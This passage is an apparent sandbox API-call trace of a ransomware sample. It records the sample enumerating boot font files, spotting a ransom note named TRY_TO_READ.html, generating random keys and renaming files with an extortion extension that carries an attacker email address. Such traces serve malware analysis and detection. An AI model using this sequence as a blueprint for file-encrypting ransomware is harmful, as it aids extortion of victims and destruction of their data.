[0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.597] GetLastError () returned 0x6 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e288 | out: hHeap=0x2e0000) returned 1 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.597] FindNextFileW (in: hFindFile=0x35d858, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.597] GetLastError () returned 0x6 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e288 | out: hHeap=0x2e0000) returned 1 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.597] FindNextFileW (in: hFindFile=0x35d858, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.597] GetLastError () returned 0x6 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e288 | out: hHeap=0x2e0000) returned 1 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.597] FindNextFileW (in: hFindFile=0x35d858, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0116.597] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.598] GetLastError () returned 0x6 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324248 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324248 | out: hHeap=0x2e0000) returned 1 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e288 | out: hHeap=0x2e0000) returned 1 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324248 [0116.598] FindNextFileW (in: hFindFile=0x35d858, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fbb870, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96fbb870, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fbb870, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.598] GetLastError () returned 0x6 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324290 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324290 | out: hHeap=0x2e0000) returned 1 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.598] FindNextFileW (in: hFindFile=0x35d858, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.598] GetLastError () returned 0x6 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324290 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324290 | out: hHeap=0x2e0000) returned 1 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e288 | out: hHeap=0x2e0000) returned 1 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324290 [0116.598] FindNextFileW (in: hFindFile=0x35d858, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x360970 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x361d70 [0116.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330ae8 [0116.598] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x361d70 | out: pbBuffer=0x361d70) returned 1 [0116.599] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330ae8 | out: pbBuffer=0x330ae8) returned 1 [0116.599] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", dwFileAttributes=0x80) returned 0 [0116.599] lstrlenW (lpString="C:\\\\Boot\\Fonts\\wgl4_boot.ttf") returned 28 [0116.599] GetProcessHeap () returned 0x2e0000 [0116.599] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9e) returned 0x30e4b0 [0116.599] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\wgl4_boot.ttf") returned="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" [0116.599] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" [0116.600] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.600] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.600] GetProcessHeap () returned 0x2e0000 [0116.600] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.600] CloseHandle (hObject=0xffffffff) returned 0 [0116.600] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360970 | out: hHeap=0x2e0000) returned 1 [0116.600] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324290 | out: hHeap=0x2e0000) returned 1 [0116.600] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324290 [0116.600] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x361e78 [0116.600] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330af8 [0116.600] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x361e78 | out: pbBuffer=0x361e78) returned 1 [0116.600] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330af8 | out: pbBuffer=0x330af8) returned 1 [0116.600] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf", dwFileAttributes=0x80) returned 0 [0116.600] lstrlenW (lpString="C:\\\\Boot\\Fonts\\kor_boot.ttf") returned 27 [0116.600] GetProcessHeap () returned 0x2e0000 [0116.600] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9c) returned 0x30e4b0 [0116.600] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\Fonts\\kor_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\kor_boot.ttf") returned="C:\\\\Boot\\Fonts\\kor_boot.ttf" [0116.600] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\kor_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" [0116.600] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.600] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.601] GetProcessHeap () returned 0x2e0000 [0116.601] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.601] CloseHandle (hObject=0xffffffff) returned 0 [0116.601] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324290 | out: hHeap=0x2e0000) returned 1 [0116.601] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324248 | out: hHeap=0x2e0000) returned 1 [0116.601] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324248 [0116.601] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x361f80 [0116.601] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b08 [0116.601] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x361f80 | out: pbBuffer=0x361f80) returned 1 [0116.601] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b08 | out: pbBuffer=0x330b08) returned 1 [0116.601] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf", dwFileAttributes=0x80) returned 0 [0116.601] lstrlenW (lpString="C:\\\\Boot\\Fonts\\jpn_boot.ttf") returned 27 [0116.601] GetProcessHeap () returned 0x2e0000 [0116.601] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9c) returned 0x30e4b0 [0116.601] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\Fonts\\jpn_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\jpn_boot.ttf") returned="C:\\\\Boot\\Fonts\\jpn_boot.ttf" [0116.601] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\jpn_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" [0116.601] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.601] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.601] GetProcessHeap () returned 0x2e0000 [0116.601] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.601] CloseHandle (hObject=0xffffffff) returned 0 [0116.601] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324248 | out: hHeap=0x2e0000) returned 1 [0116.601] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.601] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.601] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x362088 [0116.601] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b18 [0116.601] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x362088 | out: pbBuffer=0x362088) returned 1 [0116.602] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b18 | out: pbBuffer=0x330b18) returned 1 [0116.602] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf", dwFileAttributes=0x80) returned 0 [0116.602] lstrlenW (lpString="C:\\\\Boot\\Fonts\\cht_boot.ttf") returned 27 [0116.602] GetProcessHeap () returned 0x2e0000 [0116.602] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9c) returned 0x30e4b0 [0116.602] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\Fonts\\cht_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\cht_boot.ttf") returned="C:\\\\Boot\\Fonts\\cht_boot.ttf" [0116.602] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\cht_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" [0116.602] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.602] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.602] GetProcessHeap () returned 0x2e0000 [0116.602] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.602] CloseHandle (hObject=0xffffffff) returned 0 [0116.602] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.602] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.602] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.602] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x362190 [0116.602] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b28 [0116.602] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x362190 | out: pbBuffer=0x362190) returned 1 [0116.602] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b28 | out: pbBuffer=0x330b28) returned 1 [0116.602] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf", dwFileAttributes=0x80) returned 0 [0116.602] lstrlenW (lpString="C:\\\\Boot\\Fonts\\chs_boot.ttf") returned 27 [0116.602] GetProcessHeap () returned 0x2e0000 [0116.602] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9c) returned 0x30e4b0 [0116.602] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\Fonts\\chs_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\chs_boot.ttf") returned="C:\\\\Boot\\Fonts\\chs_boot.ttf" [0116.602] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\chs_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" [0116.602] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.603] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.603] GetProcessHeap () returned 0x2e0000 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.603] CloseHandle (hObject=0xffffffff) returned 0 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.603] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e2d8 | out: hHeap=0x2e0000) returned 1 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e300 | out: hHeap=0x2e0000) returned 1 [0116.603] FindFirstFileW (in: lpFileName="C:\\\\Boot\\fr-FR\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35d898 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.603] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.603] GetLastError () returned 0x6 [0116.603] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.603] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.603] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e2d8 [0116.603] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d8d8 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d8d8 | out: hHeap=0x2e0000) returned 1 [0116.603] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e2d8 | out: hHeap=0x2e0000) returned 1 [0116.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.603] FindNextFileW (in: hFindFile=0x35d898, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.604] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.604] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.604] GetLastError () returned 0x6 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e2d8 [0116.605] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d8d8 [0116.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d8d8 | out: hHeap=0x2e0000) returned 1 [0116.605] RtlAllocateHeap 